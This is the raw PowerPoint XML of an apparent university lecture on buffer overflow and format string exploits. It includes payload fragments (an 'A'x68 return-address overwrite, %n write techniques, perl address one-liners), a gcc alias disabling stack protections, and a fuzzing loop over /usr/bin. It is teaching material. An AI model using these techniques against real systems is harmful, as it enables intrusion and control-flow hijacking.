            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> calculated using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>scut’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> algorithm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US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6563" y="1760765"/>
            <a:ext cx="7122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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stackpop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>&gt;&lt;address/value * 4&gt;&lt;write code&gt;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1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err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Addresses inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> may be different than on command line</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has a slightly different environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Before submitting assignment, make sure you are using the real addresses. You can use “%08x.%08x.” from command line to find real addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use 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args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –e ‘print “\x51\xf7\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xbf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”’` </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to get addresses into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. I don’t know of an easier way.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Learn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cheat sheet on website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most important: break-points, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (next-instruction), s (next statement), x /&lt;spec&gt; (inspect memory), and p /&lt;spec&gt; (print variable)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24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spurious format specifiers to walk the stack until format string is reached</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zero and width, e.g., %08x </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use format string buffer itself to encode addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two ways to overwrite ret address:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use %n </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for basic buffer overflow.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8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since 1996?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26328" y="4267200"/>
            <a:ext cx="373934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Assigned Reading:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Smashing the stack in 2011</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by Paul </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Makowski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838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has happened…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Heap-based buffer overflows also common</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>[not mentioned] fortified source by static analysis</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>(e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> can sometimes replace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>strcpy_chk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Future Lectures:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Canary (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ProPolice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Data Execution Protection/No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>eXecute</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Address Space Layout Randomization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75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647700" y="5410200"/>
            <a:ext cx="7848600" cy="1046827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bIns="0" rtlCol="0" anchor="t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  <a:t>alias gcc732='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas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  <a:t> -m32 -g3 -O1 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fverbose-asm</a:t>
            </a:r>
            <a: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  <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a: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  <a:t>-omit-frame-pointer</a:t>
            </a:r>
            <a:b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Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a: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  <a:t>-stack-boundary=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-stack-protector -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-PIC</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty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1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>-D_FORTIFY_SOURCE=0'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28612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little has changed…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 to gain entry remains the same</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>format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What’s different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>is shellcode: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78503" y="4191001"/>
            <a:ext cx="6386995" cy="2362199"/>
            <a:chOff x="1156805" y="4191000"/>
            <a:chExt cx="6386995" cy="2362199"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="8" name="Group 7"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1156805" y="4191000"/>
              <a:ext cx="6386995" cy="1295400"/>
              <a:chOff x="1156805" y="4191000"/>
              <a:chExt cx="6386995" cy="1295400"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="Picture 5" descr="oriented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98900" y="4276919"/>
                <a:ext cx="3644900" cy="1209481"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="5" name="Picture 4" descr="return-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56805" y="4191000"/>
                <a:ext cx="2908300" cy="1295400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6" descr="programming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84852" y="5301402"/>
              <a:ext cx="5930900" cy="1251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1993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768804"/>
            <a:ext cx="4455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794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2857500"/>
            <a:ext cx="3352800" cy="11430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 spc="-50" normalizeH="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</a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr 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  <a:t>Fact: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  <a:t> </a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>Ubuntu Linux has over </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>99,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>known bugs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2" descr="iStock_000018008714XSmall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17822"/>
            <a:ext cx="2514600" cy="2014279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="iStock_000013159460XSmall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3" r="31501"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5792823" y="2895601"/>
            <a:ext cx="1927412" cy="30769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8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94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Font typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"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inp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>=`</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> –e '{print "A"x8000}'`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> for program in /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/bin/*; do</a:t>
            </a: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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   for opt in {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>a..z</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>} {A..Z}; do</a:t>
            </a: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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>     timeout –s 9 1s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         $program -$opt $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>inp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRP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>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>   done</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> done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8229600" cy="14478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457200" bIns="457200" rtlCol="0" anchor="ctr" anchorCtr="1">
            <a:no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ambria"/>
              </a:rPr>
              <a:t>1009 Linux programs. 13 minutes. 52 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Cambria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ambria"/>
              </a:rPr>
              <a:t>bugs in 29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9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wif0Q2wfUwWj2sLplz8m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Edv18DG593JvVXcctE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6972</TotalTime>
  <Words>6509</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>1200</Paragraphs>
  <Slides>78</Slides>
  <Notes>37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Cambria</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>template</vt:lpstr>
      <vt:lpstr>5_template</vt:lpstr>
      <vt:lpstr>Exploits Buffer Overflows and Format String Attacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Seth’s Notes</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Which bugs are exploitable?</vt:lpstr>
      <vt:lpstr>Bugs and Exploits</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Control Flow Recap</vt:lpstr>
      <vt:lpstr>Basic Execution</vt:lpstr>
      <vt:lpstr>Seth’s Notes</vt:lpstr>
      <vt:lpstr>Seth’s Notes</vt:lpstr>
      <vt:lpstr>Seth’s Notes</vt:lpstr>
      <vt:lpstr>Seth’s Notes</vt:lpstr>
      <vt:lpstr>EBP and ESP</vt:lpstr>
      <vt:lpstr>cdecl – the default for Linux &amp; gcc</vt:lpstr>
      <vt:lpstr>Control Flow Hijack:  Always Computation + Control</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>What are Buffer Overflows?</vt:lpstr>
      <vt:lpstr>Basic Example</vt:lpstr>
      <vt:lpstr>“123456”</vt:lpstr>
      <vt:lpstr>“A”x68 . “\xEF\xBE\xAD\xDE”</vt:lpstr>
      <vt:lpstr>Frame teardown—1</vt:lpstr>
      <vt:lpstr>Frame teardown—2</vt:lpstr>
      <vt:lpstr>Frame teardown—3</vt:lpstr>
      <vt:lpstr>Shellcode</vt:lpstr>
      <vt:lpstr>Executing system calls</vt:lpstr>
      <vt:lpstr>Shellcode example</vt:lpstr>
      <vt:lpstr>Program Example</vt:lpstr>
      <vt:lpstr>Execution</vt:lpstr>
      <vt:lpstr>Tips</vt:lpstr>
      <vt:lpstr>nop slides</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>Format String Attacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Channeling Vulnerabilities</vt:lpstr>
      <vt:lpstr>Don’t abuse printf</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Format String Functions</vt:lpstr>
      <vt:lpstr>Variadic Functions</vt:lpstr>
      <vt:lpstr>Assembly View</vt:lpstr>
      <vt:lpstr>Simple Example</vt:lpstr>
      <vt:lpstr>Stack Diagram for printf</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Parsing Format Strings</vt:lpstr>
      <vt:lpstr>Conversion Specifications</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Stack Diagram @ printf</vt:lpstr>
      <vt:lpstr>Viewing Stack</vt:lpstr>
      <vt:lpstr>Viewing Specific Address—1</vt:lpstr>
      <vt:lpstr>Viewing Specific Address—2</vt:lpstr>
      <vt:lpstr>Control Flow Hijack</vt:lpstr>
      <vt:lpstr>Specifying Length</vt:lpstr>
      <vt:lpstr>Overflow by Format String</vt:lpstr>
      <vt:lpstr>%n Format Specifier</vt:lpstr>
      <vt:lpstr>%n Format Specifier</vt:lpstr>
      <vt:lpstr>Writing to Specific Address</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>Writing Arbitrary Values</vt:lpstr>
      <vt:lpstr>All in one write</vt:lpstr>
      <vt:lpstr>Writing an arbitrary 4-byte address to an arbitrary 4-byte destination</vt:lpstr>
      <vt:lpstr>Practical gdb Tips</vt:lpstr>
      <vt:lpstr>Recap</vt:lpstr>
      <vt:lpstr>What’s new since 1996?</vt:lpstr>
      <vt:lpstr>A lot has happened…</vt:lpstr>
      <vt:lpstr>But little has changed…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Seth Nielson</cp:lastModifiedBy>
  <cp:revision>1752</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-11-02T18:57:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-02-03T15:41:50Z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